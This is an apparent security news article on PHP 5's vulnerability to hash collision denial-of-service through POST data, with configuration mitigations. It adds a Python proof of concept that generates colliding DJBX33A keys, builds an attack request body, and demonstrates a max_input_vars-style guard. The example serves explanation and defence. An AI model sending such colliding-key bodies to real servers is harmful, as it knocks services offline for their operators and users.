Researchers showed that some programming language implementations neither sufficiently randomize their hash functions nor provide a way to limit the number of colliding keys an attacker can submit in one request, which makes them vulnerable to hash collision denial-of-service attacks. Among the implementations affected by this issue is PHP 5.
“PHP 5 uses the DJBX33A (Dan Bernstein's times 33, addition) hash function and parses POST form data into the $_POST hash table. Because of the structure of the hash function, it is vulnerable to an equivalent substring attack,” reads the n.runs AG advisory.
The PHP Group has not released an official statement regarding the issue, but PHP 5.4.0 RC4 adds a max_input_vars directive that caps the number of input variables accepted per request, which helps mitigate hash collision attacks. However, 5.4.0 RC4 is a release candidate, not a stable release.
Until the vendor responds, users are advised to limit the time a request may spend parsing input data by configuring the max_input_time directive (a value in seconds; it covers the parsing of POST and GET data, not the script's own execution time). Another way to mitigate the attack is to limit the maximum POST size with post_max_size, which bounds how many colliding keys a single request can carry.
Those who use Suhosin, the open source patch for PHP that comes with some security improvements, can use suhosin.post.max_vars to define the maximum number of variables that may be registered through a POST request.
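The following Python program is an added example, not code from the n.runs advisory or from PHP itself. It reimplements PHP 5's DJBX33A hash, derives equal-length two-character keys that hash to the same value, and uses the equivalent substring property quoted above to multiply them into a large set of colliding keys. It then inserts those keys into a minimal chained hash table standing in for $_POST, counting key comparisons so the quadratic cost is visible, and finally applies a max_input_vars-style limit before any key is hashed. Assumptions: the hash is truncated to 32 bits (the collisions are exact integer equalities, so they hold at any width), the table uses 1024 buckets, and `parse_post` rejects an oversized request outright rather than truncating it with a warning as PHP 5.4 does.

```python
"""Added example: PHP 5 DJBX33A hash collisions and a max_input_vars guard."""
import string
from itertools import product
from typing import Optional


def djbx33a(key: str) -> int:
    """DJBX33A as used by PHP 5: h = 5381; h = h * 33 + c for each byte.
    Truncated to 32 bits here (assumption); equal-hash keys stay equal at
    any width because the collisions below are exact integer equalities."""
    h = 5381
    for b in key.encode("latin-1"):
        h = (h * 33 + b) & 0xFFFFFFFF
    return h


def colliding_blocks(alphabet: str = string.ascii_letters + string.digits) -> list:
    """Return the largest group of two-character keys over `alphabet` that
    share a DJBX33A hash. For "ab" the hash is 5381*33*33 + 33*a + b, so
    any keys with equal 33*a + b collide (e.g. "Ez", "FY", "G8")."""
    groups = {}
    for a, b in product(alphabet, repeat=2):
        groups.setdefault(djbx33a(a + b), []).append(a + b)
    return max(sorted(groups.values()), key=len)


def make_colliding_keys(blocks: list, n: int) -> list:
    """Equivalent substring attack: hash(P + Q) = hash(P) * 33**len(Q) + g(Q),
    so concatenating equal-length, equal-hash blocks in every order yields
    len(blocks)**n keys that all share one hash."""
    return ["".join(p) for p in product(blocks, repeat=n)]


def attack_body(keys: list) -> str:
    """Constructed application/x-www-form-urlencoded body for the keys."""
    return "&".join(f"{k}=1" for k in keys)


class ChainedTable:
    """Minimal chained hash table keyed by DJBX33A, standing in for PHP's
    HashTable. Counts key comparisons made during insertion."""

    def __init__(self, nbuckets: int = 1 << 10):  # 1024 buckets (assumption)
        self.buckets = [[] for _ in range(nbuckets)]
        self.mask = nbuckets - 1
        self.comparisons = 0

    def insert(self, key: str, value: str) -> None:
        bucket = self.buckets[djbx33a(key) & self.mask]
        for entry in bucket:  # linear scan of the chain, as zend_hash_add does
            self.comparisons += 1
            if entry[0] == key:
                entry[1] = value
                return
        bucket.append([key, value])


def parse_post(body: str, max_input_vars: int) -> Optional[ChainedTable]:
    """Parse a form body into a ChainedTable. Counts variables before hashing
    any of them and refuses the request when the count exceeds
    max_input_vars (PHP 5.4 truncates with a warning instead; rejecting is
    a simplification for this example)."""
    pairs = [p for p in body.split("&") if p]
    if len(pairs) > max_input_vars:
        return None
    table = ChainedTable()
    for pair in pairs:
        key, _, value = pair.partition("=")
        table.insert(key, value)
    return table


if __name__ == "__main__":
    blocks = colliding_blocks()
    keys = make_colliding_keys(blocks, 4)
    hostile = parse_post(attack_body(keys), max_input_vars=1000)
    benign = parse_post(attack_body([f"k{i}" for i in range(len(keys))]), 1000)
    print("blocks:", blocks, "-> %d colliding keys" % len(keys))
    print("comparisons, colliding keys:", hostile.comparisons)
    print("comparisons, benign keys:   ", benign.comparisons)
    bigger = make_colliding_keys(blocks, 5)
    print("243-key body with max_input_vars=100 accepted:",
          parse_post(attack_body(bigger), max_input_vars=100) is not None)
```

With three colliding blocks, four-block keys give 81 colliding entries and 81*80/2 = 3240 key comparisons for a request of under a kilobyte, against essentially none for ordinary keys; the cost grows quadratically with the number of keys, and only the variable-count limit (or a size or time cap, as recommended above) stops an attacker from scaling it further.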
Other web programming languages and applications are also susceptible to a similar DoS attack.
PHP 5.3.8 and 5.4.0 RC4 are available for download; note that the stable 5.3.8 release does not include the max_input_vars directive, so the workarounds above still apply to it.